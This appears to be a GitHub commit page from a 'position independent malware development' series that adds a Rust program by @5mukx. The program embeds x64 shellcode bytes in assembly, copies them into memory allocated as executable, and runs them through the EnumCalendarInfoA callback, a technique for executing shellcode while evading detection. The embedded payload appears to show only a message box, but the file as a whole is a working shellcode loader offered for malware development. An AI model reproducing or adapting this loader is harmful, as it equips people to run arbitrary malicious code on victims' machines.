Skip to content

Commit 044c4ac

Browse files
committed
Position Independent malware development
position independent malware development series
1 parent cc97a6f commit 044c4ac

File tree

1 file changed

+74
-0
lines changed

1 file changed

+74
-0
lines changed

position independent/sample_asm.rs

Lines changed: 74 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,74 @@
1+
/*
2+
Sample Shellcode Execution through ASM...
3+
By @5mukx
4+
*/
5+
use std::arch::global_asm;
6+
use std::ptr::null_mut;
7+
use winapi::um::handleapi::CloseHandle;
8+
use winapi::um::memoryapi::VirtualAlloc;
9+
use winapi::um::winnls::EnumCalendarInfoA;
10+
11+
12+
global_asm!(
13+
r#"
14+
.section .rodata
15+
.global rust_asm_func
16+
rust_asm_func:
17+
.byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff
18+
.byte 0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51
19+
.byte 0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b
20+
.byte 0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50
21+
.byte 0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0
22+
.byte 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41
23+
.byte 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20
24+
.byte 0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00
25+
.byte 0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e
26+
.byte 0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3
27+
.byte 0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6
28+
.byte 0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41
29+
.byte 0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08
30+
.byte 0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49
31+
.byte 0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40
32+
.byte 0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0
33+
.byte 0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41
34+
.byte 0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59
35+
.byte 0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e
36+
.byte 0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26
37+
.byte 0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48
38+
.byte 0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01
39+
.byte 0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff
40+
.byte 0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5
41+
.byte 0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73
42+
.byte 0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e
43+
.byte 0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73
44+
.byte 0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00
45+
"#
46+
);
47+
48+
extern "C"{
49+
static rust_asm_func: [u8; 328];
50+
}
51+
52+
fn main(){
53+
unsafe{
54+
let shellcode = rust_asm_func;
55+
56+
let addr = VirtualAlloc(
57+
null_mut(),
58+
shellcode.len(),
59+
0x1000 | 0x2000,
60+
0x40,
61+
);
62+
63+
std::ptr::copy_nonoverlapping(shellcode.as_ptr(), addr as *mut u8, shellcode.len());
64+
65+
EnumCalendarInfoA(
66+
std::mem::transmute(addr),
67+
0x0400,
68+
4294967295u32, 21u32
69+
);
70+
71+
CloseHandle(addr);
72+
73+
}
74+
}

0 commit comments

Comments
 (0)